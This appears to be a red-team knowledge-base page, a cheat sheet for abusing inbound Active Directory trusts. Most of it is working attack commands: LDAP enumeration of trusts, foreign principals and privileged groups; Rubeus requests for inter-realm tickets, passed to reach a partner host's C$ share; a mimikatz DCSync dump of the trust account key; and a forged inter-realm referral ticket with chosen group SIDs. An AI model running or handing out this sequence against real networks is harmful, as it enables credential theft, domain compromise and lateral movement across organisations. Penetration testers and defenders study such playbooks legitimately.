Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / Trusts / Techniques

Inbound

Inbound trust abuse starts when the target domain trusts principals from another domain. We operate from the trusted side, identify which foreign principals have access in the trusting domain, then impersonate or forge the right identity to reach the resource.

Read the target trust object

ldapsearch -LLL -x -H ldap://target-dc.partner.com -D 'TRUSTED\user' -w 'Password123!' -b 'DC=partner,DC=com' '(objectClass=trustedDomain)' name trustPartner trustDirection trustAttributes flatName

Enumerate foreign security principals in the trusting domain

ldapsearch -LLL -x -H ldap://target-dc.partner.com -D 'TRUSTED\user' -w 'Password123!' -b 'DC=partner,DC=com' '(objectClass=foreignSecurityPrincipal)' cn memberOf distinguishedName

Ignore default well-known SIDs

S-1-5-4
S-1-5-9
S-1-5-11
S-1-5-17

Resolve interesting foreign SID in the source domain

ldapsearch -LLL -x -H ldap://trusted-dc.trusted.local -D 'TRUSTED\user' -w 'Password123!' -b 'DC=trusted,DC=local' '(objectSid=S-1-5-21-1111111111-2222222222-3333333333-6102)' samAccountName distinguishedName objectClass

Enumerate members of the privileged target-domain group

ldapsearch -LLL -x -H ldap://target-dc.partner.com -D 'TRUSTED\user' -w 'Password123!' -b 'DC=partner,DC=com' '(&(|(samAccountType=805306368)(samAccountType=268435456))(memberOf=CN=Partner Jump Users,CN=Users,DC=partner,DC=com))' distinguishedName sAMAccountName

Enumerate target DCs

nslookup -type=SRV _ldap._tcp.dc._msdcs.partner.com 10.10.10.200

Enumerate GPOs and links

ldapsearch -LLL -x -H ldap://target-dc.partner.com -D 'TRUSTED\user' -w 'Password123!' -b 'DC=partner,DC=com' '(objectClass=groupPolicyContainer)' displayName gPCFileSysPath

ldapsearch -LLL -x -H ldap://target-dc.partner.com -D 'TRUSTED\user' -w 'Password123!' -b 'DC=partner,DC=com' '(&(|(objectClass=organizationalUnit)(objectClass=domain))(gPLink=*{DFE606B4-CA59-4AD6-9BCE-55AF35888129}*))' objectClass name

Known user ticket path with Rubeus

Rubeus.exe asktgt /user:rsteel /domain:trusted.local /aes256:<USER_AES256> /dc:trusted-dc.trusted.local /nowrap

Rubeus.exe asktgs /service:krbtgt/partner.com /ticket:<TGT_BASE64> /nowrap

Rubeus.exe asktgs /service:cifs/par-jmp-1.partner.com /targetdomain:partner.com /dc:target-dc.partner.com /ticket:<INTER_REALM_TGT_BASE64> /ptt
dir \\par-jmp-1.partner.com\c$

Forge inter-realm referral ticket with trust key

mimikatz.exe "lsadump::dcsync /domain:trusted.local /user:TRUSTED\PARTNER$" "exit"

Rubeus.exe silver /user:pchilds /domain:trusted.local /sid:<TRUSTED_DOMAIN_SID> /id:1105 /groups:513,1106,6102 /service:krbtgt/partner.com /rc4:<INTER_REALM_RC4> /nowrap

Rubeus.exe asktgs /service:cifs/par-jmp-1.partner.com /targetdomain:partner.com /dc:target-dc.partner.com /ticket:<INTER_REALM_TGT_BASE64> /ptt
dir \\par-jmp-1.partner.com\c$

Notes

The foreign security principal object lives in the trusting domain, but the SID belongs to the trusted domain. Resolve the SID in the source domain, not in the domain where the FSP object was found.

When forging the inter-realm ticket manually, group membership must match the intended identity. Do not rely on default group values when the target access depends on a specific foreign group.